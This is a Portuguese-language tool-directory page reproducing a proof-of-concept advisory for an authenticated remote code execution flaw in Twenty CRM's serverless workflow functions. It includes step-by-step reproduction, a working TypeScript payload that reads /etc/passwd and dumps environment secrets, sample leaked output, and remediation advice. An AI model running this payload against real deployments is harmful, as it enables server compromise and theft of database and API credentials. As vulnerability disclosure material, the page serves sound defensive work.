Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-26720-Twenty-RCE — Prova de conceito para execução remota de código autenticada no Twenty CRM por meio de funções de fluxo de trabalho serverless sem sandbox, permitindo execução arbitrária de comandos Node.js e divulgação de variáveis de ambiente. | Kitploit
Ferramentas/GitHubGitHub/dillonkirsch/cve-2026-26720-twenty-rce
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebSegurança na NuvemConfiguração Incorreta
GitHubdillonkirsch/cve-2026-26720-twenty-rce

CVE-2026-26720-Twenty-RCE

Prova de conceito para execução remota de código autenticada no Twenty CRM por meio de funções de fluxo de trabalho serverless sem sandbox, permitindo execução arbitrária de comandos Node.js e divulgação de variáveis de ambiente.

Ver Repositório
há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Twenty CRM - Execução Remota de Código Autenticada (RCE)

Visão Geral

Produto: Twenty CRM

Vulnerabilidade: Execução Remota de Código (RCE) via Funções Serverless de Workflow

Severidade: Crítica

Componente Afetado: Automação de Workflow (Código - Função Serverless)

Versão Testada: v1.15.0

Este repositório documenta uma vulnerabilidade crítica no mecanismo de workflow do Twenty CRM. O componente "Código - Função Serverless" permite que usuários autenticados executem código Node.js arbitrário. Devido à falta de sandboxing, é possível importar o módulo child_process e executar comandos de nível de sistema no servidor host.

Detalhes da Vulnerabilidade

A aplicação permite que usuários criem workflows de automação personalizados que incluem uma etapa de execução de código. Embora isso seja destinado à manipulação de dados, o ambiente de execução não restringe adequadamente o acesso aos módulos internos do Node.js ou ao sistema operacional subjacente.

Um atacante pode utilizar execSync da biblioteca child_process para:

  • Executar comandos de shell (ex.: cat, ls, whoami).
  • Ler arquivos sensíveis do sistema de arquivos (ex.: /etc/passwd).
  • Despejar variáveis de ambiente (process.env), revelando credenciais de banco de dados, chaves de API e segredos da aplicação.
  • Prova de Conceito (PoC)

    Passos para Reproduzir

    1. Faça login no Twenty CRM.
    2. Navegue até Configurações > Workflows.
    3. Crie um novo Workflow com um Gatilho Manual.
    4. Adicione uma ação: Código - Função Serverless.
    5. Cole o seguinte payload TypeScript no editor de código:
    root@kitploit:~
    import { execSync } from 'child_process';
    
    export const main = async (params: any): Promise<object> => {
      try {
        // 1. Execução Remota de Comandos: Ler usuários do sistema
        const output = execSync('cat /etc/passwd').toString();
        
        // 2. Divulgação de Informações: Despejar todas as variáveis de ambiente (Segredos)
        const secrets = JSON.stringify(process.env);
        
        return { 
          data: output, 
          secrets: secrets 
        };
      } catch (e: any) {
        return { error: e.message };
      }
    };
    
    
    1. Salve e execute o workflow.

    Visão Geral do Código

    Saída Observada

    O workflow é executado com sucesso e retorna os dados do sistema.

    Acesso a Arquivos do Sistema (/etc/passwd):

    root@kitploit:~
    root:x:0:0:root:/root:/bin/sh
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    postgres:x:70:70:PostgreSQL user:/var/lib/postgresql:/bin/sh
    ...
    
    

    Variáveis de Ambiente Vazadas: O despejo de process.env revelou detalhes críticos de configuração:

    • PG_DATABASE_URL (Credenciais do Banco de Dados)
    • APP_SECRET (Chaves de assinatura)
    • REDIS_URL
    • AWS_ACCESS_KEY (Se configurado)

    Impacto

    Esta vulnerabilidade permite que um usuário autenticado (com permissões para criar workflows) alcance o Comprometimento Total do Sistema.

    • Confidencialidade: Atacantes podem ler todos os dados no banco de dados e no sistema de arquivos.
    • Integridade: Atacantes podem modificar o código da aplicação, excluir dados ou injetar malware.
    • Disponibilidade: Atacantes podem desligar o servidor ou consumir todos os recursos.

    Remediação

    Para corrigir este problema, o recurso "Função Serverless" requer isolamento adequado.

    • Implementar Sandboxing: O código deve ser executado em um ambiente restrito (ex.: um sandbox VM2, um contêiner Docker dedicado sem acesso à rede/volumes, ou uma micro-VM como Firecracker).
    • Restringir Módulos: Desabilitar o acesso a módulos sensíveis do Node.js, como child_process, fs e net.
    • Limpeza de Variáveis de Ambiente: Garantir que o contexto de execução não herde as variáveis de ambiente do processo pai (que contêm os segredos da aplicação).

    Linha do Tempo

    • 8 de janeiro de 2026: Vulnerabilidade descoberta.
    • [Data]: Reportada à Equipe de Segurança do Twenty CRM.
    • [Status]: Aguardando Patch.
    Baixar ferramenta